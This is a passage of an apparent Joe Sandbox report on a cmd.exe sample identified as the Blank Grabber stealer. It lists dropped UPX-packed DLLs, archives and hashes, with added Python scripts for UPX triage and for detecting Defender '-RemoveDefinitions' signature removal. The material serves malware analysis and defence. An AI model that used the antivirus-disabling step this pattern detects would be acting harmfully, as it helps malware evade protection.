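_END = re.compile(r"^MpCmdRun: End Time:\s*(.*?)\s*$")
_REMOVE_DEFS = re.compile(r"-RemoveDefinitions\b", re.IGNORECASE)


def parse_entries(text: str) -> List[MpCmdRunEntry]:
    """Split the log into entries delimited by the dashed separator lines."""
    entries: List[MpCmdRunEntry] = []
    current: Optional[MpCmdRunEntry] = None
    for line in text.replace(LRM, "").splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if set(stripped) == {"-"}:            # separator: closes an open entry
            if current is not None:
                entries.append(current)
                current = None
            continue
        m = _CMDLINE.match(line)
        if m:
            current = MpCmdRunEntry(command_line=m.group(1))
        if current is None:
            continue                           # stray text outside an entry
        current.lines.append(line)
        if (m := _START.match(line)):
            current.start_time = m.group(1)
        elif (m := _END.match(line)):
            current.end_time = m.group(1)
    if current is not None:                    # log truncated before its closing separator
        entries.append(current)
    return entries


def find_signature_removal(entries: List[MpCmdRunEntry]) -> List[MpCmdRunEntry]:
    """Entries whose command line invoked -RemoveDefinitions (any variant)."""
    return [e for e in entries if _REMOVE_DEFS.search(e.command_line)]


if __name__ == "__main__":
    for e in find_signature_removal(parse_entries(decode_log(SAMPLE_LOG_BYTES))):
        print(f"{e.start_time}: {e.command_line}")
```

On a live host, pair a hit here with the corresponding process-creation event for MpCmdRun.exe and check the parent: the record above shows it launched during the cmd.exe sample's execution, which is the context that turns a legitimate administrative switch into an indicator.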
                                                                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sat Nov 23 20:38:33 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1372
                                                                                                                                                                                                                                    Entropy (8bit):4.132599337169319
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:HNFq9s+filNDfHuwK9GofkNWI+ycuZhNc+akSffPNnqS+d:tgi/tKDk41ulc+a3f9qSe
                                                                                                                                                                                                                                    MD5:91B39F033F70CCB7C191263CA09EC79E
                                                                                                                                                                                                                                    SHA1:87A52802FCD18A89EA1DD1F943FC66BC455694D1
                                                                                                                                                                                                                                    SHA-256:780BE71647DD424CF21E3C298C450AE54AA14BB96942401C4B30E5683B424A48
                                                                                                                                                                                                                                    SHA-512:84D9930A417311BBD05FD3A4B15AFF4C7606882EBD0DE0A5BDF1F4B7F9DC5E2BCBF2E70388E00071F9E1501A57B2C8C7EE25E2765C3AB524D9893946CA6C9697
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:L...I=Bg.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\bcdu5fii\CSC91B7380AF2C2414A909984B12C6688DE.TMP................N.`..K.|...(.............4.......C:\Users\user\AppData\Local\Temp\RES74CA.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.c.d.u.5.f.i.i...d.l.l.....(.....L.e.g.a.
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):109392
Entropy (8bit):6.643764685776923
Encrypted:false
SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
MD5:870FEA4E961E2FBD00110D3783E529BE
SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View (other submissions that dropped the same file):
• Filename: NEVER OPEN!.exe, Detection: malicious
• Filename: HeilHitler.exe, Detection: malicious
• Filename: meN9qeS2DE.exe, Detection: malicious
• Filename: client1.exe, Detection: malicious
• Filename: qbE2mhhzCq.exe, Detection: malicious
• Filename: UwOcZADSmi.exe, Detection: malicious
• Filename: IyWKJMlCXg.exe, Detection: malicious
• Filename: SecuriteInfo.com.Python.Stealer.1545.20368.28754.exe, Detection: malicious
• Filename: JdHvcxG4Up.exe, Detection: malicious
• Filename: souFnS89FP.exe, Detection: malicious
Preview:MZ/PE32+ image ("This program cannot be run in DOS mode" stub, Rich header); sections .text, .rdata, .data, .pdata, _RDATA, .rsrc, .reloc; no UPX section names or trailer, unlike the UPX-packed DLLs that follow. Note that a 0% AV detection on this DLL says little: the same file has been dropped by ten other submissions that were classified malicious.
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):47992
Entropy (8bit):7.809914406923306
Encrypted:false
SSDEEP:768:RiQxyc/3D2HGItfsKbsonbgiHUoYbcp87I7tVbeiYiSyv5PxWEDX:R5xdEsKbtnbgqUoYb7I7tVbh7SyxPx9
MD5:93FE6D3A67B46370565DB12A9969D776
SHA1:FF520DF8C24ED8AA6567DD0141EF65C4EA00903B
SHA-256:92EC61CA9AC5742E0848A6BBB9B6B4CDA8E039E12AB0F17FB9342D082DDE471B
SHA-512:5C91B56198A8295086C61B4F4E9F16900A7EC43CA4B84E793BC8A3FC8676048CAB576E936515BF2971318C7847F1314674B3336FE83B1734F9F70D09615519AC
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ/PE32+ image ("This program cannot be run in DOS mode" stub, Rich header); sections UPX0, UPX1, .rsrc; "4.02" / "UPX!" trailer, i.e. UPX-packed, which accounts for the 7.81 entropy.
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):58232
Entropy (8bit):7.819692209624967
Encrypted:false
SSDEEP:1536:/UP3/jolpinLX2rRaWMzhBuW9I7QP7h7SykPxiM:I3/jolwXuRaW6wUI7QP7h2xB
MD5:813FC3981CAE89A4F93BF7336D3DC5EF
SHA1:DAFF28BCD155A84E55D2603BE07CA57E3934A0DE
SHA-256:4AC7FB7B354069E71EBF7FCC193C0F99AF559010A0AD82A03B49A92DEB0F4D06
SHA-512:CE93F21B315D96FDE96517A7E13F66AA840D4AD1C6E69E68389E235E43581AD543095582EBCB9D2C6DDA11C17851B88F5B1ED1D59D354578FE27E7299BBEA1CC
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ/PE32+ image ("This program cannot be run in DOS mode" stub, Rich header); sections UPX0, UPX1, .rsrc; "4.02" / "UPX!" trailer, i.e. UPX-packed, which accounts for the 7.82 entropy.
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):106368
Entropy (8bit):7.93479712134
Encrypted:false
SSDEEP:3072:ugCMV2Mz94bMgxECS8kePpTn8jI75qNp6mx:u1MV2Mz94og2tJePpwpp
MD5:F65D2FED5417FEB5FA8C48F106E6CAF7
SHA1:9260B1535BB811183C9789C23DDD684A9425FFAA
SHA-256:574FE8E01054A5BA07950E41F37E9CF0AEA753F20FE1A31F58E19202D1F641D8
SHA-512:030502FA4895E0D82C8CCE00E78831FC3B2E6D956C8CC3B9FB5E50CB23EF07CD6942949A9F16D02DA6908523D9D4EF5F722FB1336D4A80CD944C9F0CB11239AB
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ/PE32+ image ("This program cannot be run in DOS mode" stub, Rich header); sections UPX0, UPX1, .rsrc; "4.02" / "UPX!" trailer, i.e. UPX-packed, which accounts for the 7.93 entropy.
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):34176
Entropy (8bit):7.670946753848895
Encrypted:false
SSDEEP:768:aq3dM1TMhvg8KNML5TOuzSsI/LpazI75ImyYiSyvfPxWEabVV/:aEdM1TMho8iMLPmv/AzI75Imy7SyXPxA
MD5:4AE75C47DBDEBAA16A596F31B27ABD9E
SHA1:A11F963139C715921DEDD24BC957AB6D14788C34
SHA-256:2308EE238CC849B1110018B211B149D607BF447F4E4C1E61449049EAB0CF513D
SHA-512:E908FECB52268FAC71933E2FDB96E539BDEBE4675DFB50065AEE26727BAC53E07CCA862193BCB3AB72D2AE62D660113A47E73E1E16DB401480E4D3FD34D54FA8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ/PE32+ image ("This program cannot be run in DOS mode" stub, Rich header); sections UPX0, UPX1, .rsrc; "4.02" / "UPX!" trailer, i.e. UPX-packed, which accounts for the 7.67 entropy.
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):86392
Entropy (8bit):7.91766123352546
Encrypted:false
SSDEEP:1536:EfKvmqFMCNL6eKmtYs76LBlBqLBxcZiV6IHxdc/k4Nc+VI7e1gf7SyJPxs:4qdLCOz76LBl4VxYcdc/11I7e1gfvxs
MD5:6F810F46F308F7C6CCDDCA45D8F50039
SHA1:6EE24FF6D1C95BA67E1275BB82B9D539A7F56CEA
SHA-256:39497259B87038E86C53E7A39A0B5BBBFCEBE00B2F045A148041300B31F33B76
SHA-512:C692367A26415016E05EBE828309D3FFEC290C6D2FD8CC7419D529A51B0BEDA00CCDC327C9F187AE3CA0CC96336D23D84A8FF95B729C8958B14FB91B6DA9E878
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ/PE32+ image ("This program cannot be run in DOS mode" stub, Rich header); sections UPX0, UPX1, .rsrc; "4.02" / "UPX!" trailer, i.e. UPX-packed, which accounts for the 7.92 entropy.
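The dropped-file entries above each give hashes, an "Entropy (8bit)" value and a Preview whose UPX0/UPX1 section names and trailing "UPX!" marker show that most of these DLLs are UPX-packed, which is why their entropy sits near 7.8 while the unpacked one is at 6.64. The script below is an added example, not part of the Joe Sandbox report or of the sample: it recomputes the report's hash and entropy fields for a file and flags UPX packing from the PE section table and the trailer. The PE image it runs on is constructed in memory (valid headers, filler body) so it works offline; the function names are the example's own.

```python
"""Recompute sandbox 'dropped file' fields and flag UPX packing.

Added example, not part of the Joe Sandbox report. The hashes and the
8-bit entropy match the report's MD5/SHA1/SHA-256 and 'Entropy (8bit)'
fields; UPX detection relies on the UPX0/UPX1 section names and the
trailing 'UPX!' marker visible in the report's Preview columns.
The PE image built below is constructed in memory (headers only) so the
script runs offline; it is not one of the dropped files.
"""
import hashlib
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """Upper-case hex digests, the format the report prints."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
    }


def pe_section_names(data: bytes) -> list:
    """Return the section names from a PE image's section table.

    Layout: DOS header (e_lfanew at 0x3C) -> 'PE\\0\\0' -> 20-byte COFF
    header (NumberOfSections at +2, SizeOfOptionalHeader at +16) ->
    optional header -> 40-byte section headers, name in the first 8 bytes.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size
    names = []
    for i in range(n_sections):
        off = table + 40 * i
        if off + 40 > len(data):
            raise ValueError("section table truncated")
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def is_upx_packed(data: bytes) -> bool:
    """UPX keeps its section names (UPX0/UPX1) and writes a 'UPX!'
    marker near the end of the file; either one is a strong signal."""
    names = pe_section_names(data)
    return ("UPX0" in names and "UPX1" in names) or b"UPX!" in data[-0x400:]


def triage(data: bytes) -> dict:
    """The fields a dropped-file entry shows, plus a packer verdict."""
    info = {"Size (bytes)": len(data), "Entropy (8bit)": round(shannon_entropy(data), 6)}
    info.update(file_hashes(data))
    info["Sections"] = pe_section_names(data)
    info["UPX"] = is_upx_packed(data)
    return info


def build_sample_pe(packed: bool) -> bytes:
    """Constructed minimal PE32+ DLL (valid headers, filler body)."""
    sections = ["UPX0", "UPX1", ".rsrc"] if packed else [".text", ".rdata", ".data", ".rsrc"]
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew
    opt_size = 0xF0                                          # PE32+ optional header size
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x2022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)                    # PE32+ magic
    table = b"".join(s.encode().ljust(8, b"\0") + bytes(32) for s in sections)
    # Packed: every byte value equally often (looks compressed);
    # unpacked: a run of NOPs. Both are constructed filler, not real code.
    body = bytes(range(256)) * 4 if packed else b"\x90" * 1024
    trailer = b"4.02\0UPX!" if packed else b""
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + body + trailer


if __name__ == "__main__":
    import sys
    samples = [("constructed-packed.dll", build_sample_pe(True)),
               ("constructed-plain.dll", build_sample_pe(False))]
    for path in sys.argv[1:]:                                # real files, if given
        with open(path, "rb") as fh:
            samples.append((path, fh.read()))
    for name, blob in samples:
        print(name)
        for k, v in triage(blob).items():
            print(f"  {k}: {v}")
```

Run it with the paths of the dropped DLLs as arguments to compare the recomputed MD5/SHA1/SHA-256 and entropy against the entries above; a mismatch means a different file than the one the report describes. The UPX check is a triage heuristic only: a packer can rename sections and strip the trailer, and a high entropy value by itself also fits encrypted or compressed resources, so treat either signal as a reason to unpack and look further rather than as a verdict.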
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):24960
Entropy (8bit):7.447047314489284
Encrypted:false
SSDEEP:768:BSxw19p9opxfI77U2bYiSyvlfUvPxWEl:Bj1HgfI77U2b7SyOvPx
MD5:0E7612FC1A1FAD5A829D4E25CFA87C4F
SHA1:3DB2D6274CE3DBE3DBB00D799963DF8C3046A1D6
SHA-256:9F6965EB89BBF60DF0C51EF0750BBD0655675110D6C42ECA0274D109BD9F18A8
SHA-512:52C57996385B9A573E3105EFA09FD6FD24561589B032EF2B2EE60A717F4B33713C35989F2265669F980646D673E3C387B30B9FC98033BB8CA7C59ECE1C17E517
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):42880
Entropy (8bit):7.696654190779553
Encrypted:false
SSDEEP:768:oL7Syo5lzOt+ufVwPVXahccu0D+gFiPnmJqpE2SI7QwbmGYiSyvb9ZPxWEl:IkbzcKNGu0yXwN2SI7QwbmG7Syj/Px
MD5:7A31BC84C0385590E5A01C4CBE3865C3
SHA1:77C4121ABE6E134660575D9015308E4B76C69D7C
SHA-256:5614017765322B81CC57D841B3A63CBDC88678FF605E5D4C8FDBBF8F0AC00F36
SHA-512:B80CD51E395A3CE6F345B69243D8FC6C46E2E3828BD0A7E63673A508D889A9905D562CAC29F1ED394CCFCDA72F2F2E22F675963DD96261C19683B06DEA0A0882
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):50048
Entropy (8bit):7.761194500415829
Encrypted:false
SSDEEP:1536:c8Mdv1OCWk0z+q3QCjbouWxI75Qr27SyDPx:vQO00zrrvbQI75Qr2Nx
MD5:BB4AA2D11444900C549E201EB1A4CDD6
SHA1:CA3BB6FC64D66DEADDD804038EA98002D254C50E
SHA-256:F44D80AB16C27CA65DA23AE5FDA17EB842065F3E956F10126322B2EA3ECDF43F
SHA-512:CD3C5704E5D99980109FDC505D39AD5B26A951685E9D8E3FED9E0848CD44E24CC4611669DBDB58ACC20F1F4A5C37D5E01D9D965CF6FE74F94DA1B29AA2FF6931
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):62328
Entropy (8bit):7.84875298158187
Encrypted:false
SSDEEP:1536:0edJItp3BP6kGsJMthwMtbyG68yTyI7t7QO67SycPxu:h8tVBPpGsUt+uyuI7t7Q/+xu
MD5:081C878324505D643A70EFCC5A80A371
SHA1:8BEF8336476D8B7C5C9EF71D7B7DB4100DE32348
SHA-256:FCB70B58F94F5B0F9D027999CCE25E99DDCC8124E4DDCC521CB5B96A52FAAA66
SHA-512:C36293B968A2F83705815EF3A207E444EEB7667AD9AF61DF75E85151F74F2FE0A299B3B1349DE0D410BBBAEA9F99CAC5228189099A221DE5FA1E20C97C648E32
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\cmd.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):880537
Entropy (8bit):5.683094931343958
Encrypted:false
SSDEEP:12288:lgYJu4KWWSBC6S4I15uA4a2YSZdqVwxffpEQ+pgSLMNR:lgYJ71BBLa2LKVwxffpEQ+hMNR
MD5:699B649FAFC1ACC8A7634E266BBF0ACE
SHA1:AF1F52E4A25CBEDF30A2C521F7CB77583410553F
SHA-256:3F60DEE1B7F4A83845762F971095ADDAC36DEA72BA52086B30674BE816B6DD82
SHA-512:72BB0F6DF7B43D3C355577F6D3EB8FFA44C992C500476B335E59573AD120C1C2FAC86E81795E6100A5F58F40F9EA6FFFB90EBB286AE409EF0ED61B934C6A179A
Malicious:false
Process:C:\Users\user\Desktop\cmd.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):80445
Entropy (8bit):7.830362282849227
Encrypted:false
SSDEEP:1536:VcrMYST8c3xtXEIgD8708uyckdNtG6UiB0Jj93T7HfqLa4a9EeKGy5M3OVyb:V0cT8axNgI48A0NAYw9D7/z4am8g0OMb
MD5:8C84613303FE763E5035E1384792366D
SHA1:71CB8F3AF0BD88E534FBE49BFD4A405FDE3D0152
SHA-256:26CFBEB34E4B464ACD9A454E351489C0B45324C8BE94F532F590EC15064DAA6A
SHA-512:0A40EAA0306B5FAE7328EC8E37CFB530962C2DA775B5671F05975B0A3DA901ADD5100060A8F55B4DAA9EB63BFE5BCFCCC47988D5B9E6D9E9E16E52412C27546D
Malicious:false
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1189728
Entropy (8bit):7.945107908450931
Encrypted:false
SSDEEP:24576:jffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:Tf8JWwgho5HL3fknPSIKorCU1CPwDv3a
MD5:DAA2EED9DCEAFAEF826557FF8A754204
SHA1:27D668AF7015843104AA5C20EC6BBD30F673E901
SHA-256:4DAB915333D42F071FE466DF5578FD98F38F9E0EFA6D9355E9B4445FFA1CA914
SHA-512:7044715550B7098277A015219688C7E7A481A60E4D29F5F6558B10C7AC29195C6D5377DC234DA57D9DEF0C217BB3D7FECA332A64D632CA105503849F15E057EA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... .........@%.025..P%..................................P7...........`......................................... H5......C5.h....@5......`2.............H7......................................=5.@...........................................UPX0.....@%.............................UPX1.........P%.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):24088
                                                                                                                                                                                                                                    Entropy (8bit):7.527291720504194
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:hRZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:rwlGuUm2Evb1p07pWDG4yKRF
                                                                                                                                                                                                                                    MD5:6F818913FAFE8E4DF7FEDC46131F201F
                                                                                                                                                                                                                                    SHA1:BBB7BA3EDBD4783F7F973D97B0B568CC69CADAC5
                                                                                                                                                                                                                                    SHA-256:3F94EE4F23F6C7702AB0CC12995A6457BF22183FA828C30CC12288ADF153AE56
                                                                                                                                                                                                                                    SHA-512:5473FE57DC40AF44EDB4F8A7EFD68C512784649D51B2045D570C7E49399990285B59CFA6BCD25EF1316E0A073EA2A89FE46BE3BFC33F05E3333037A1FD3A6639
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):208224
                                                                                                                                                                                                                                    Entropy (8bit):7.9214932539909775
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:5SI3oPlWLlPVVc5MpJa1pOjJnnioIZW8/Qf6bRXGKrs8qJjueW1LR/oSB6hetz:EIek5VC0FiHof6Z1rgJ63R/oS3
                                                                                                                                                                                                                                    MD5:EAC369B3FDE5C6E8955BD0B8E31D0830
                                                                                                                                                                                                                                    SHA1:4BF77158C18FE3A290E44ABD2AC1834675DE66B4
                                                                                                                                                                                                                                    SHA-256:60771FB23EE37B4414D364E6477490324F142A907308A691F3DD88DC25E38D6C
                                                                                                                                                                                                                                    SHA-512:C51F05D26FDA5E995FE6763877D4FCDB89CD92EF2D6EE997E49CC1EE7A77146669D26EC00AD76F940EF55ADAE82921DEDE42E55F51BD10D1283ECFE7C5009778
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .....P...`..@....p................................................`..........................................6..4@...3.......0...........M...........v......................................@%..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1513336
                                                                                                                                                                                                                                    Entropy (8bit):7.991995760990047
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:24576:Umhx0O5yMVUEV51zVZ/7KqaI0jVSn/OCNYLfUehwHqDdt9OJzoCr2TAY/f+TNX59:UmT0OjUK51xZ/7s6GDwKDD9OJEwsAE2V
                                                                                                                                                                                                                                    MD5:178A0F45FDE7DB40C238F1340A0C0EC0
                                                                                                                                                                                                                                    SHA1:DCD2D3D14E06DA3E8D7DC91A69B5FD785768B5FE
                                                                                                                                                                                                                                    SHA-256:9FCB5AD15BD33DD72122A171A5D950E8E47CEDA09372F25DF828010CDE24B8ED
                                                                                                                                                                                                                                    SHA-512:4B790046787E57B9414A796838A026B1530F497A75C8E62D62B56F8C16A0CBEDBEFAD3D4BE957BC18379F64374D8D3BF62D3C64B53476C7C5005A7355ACD2CEE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R..R..R...S..R......R...W..R...V..R...Q..R.....R.K.S..R..S..R.'._.X.R.'.R..R.'....R.'.P..R.Rich..R.........PE..d......c.........." ...". ......../...E.../...................................F...........`...........................................F.......F.d.....F.......B...............F.......................................E.@...........................................UPX0....../.............................UPX1..... ..../.....................@....rsrc.........F.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):630736
                                                                                                                                                                                                                                    Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                    MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                    SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                    SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                    SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):456
                                                                                                                                                                                                                                    Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                    MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                    SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                    SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                    SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rarreg.key, Author: Joe Security
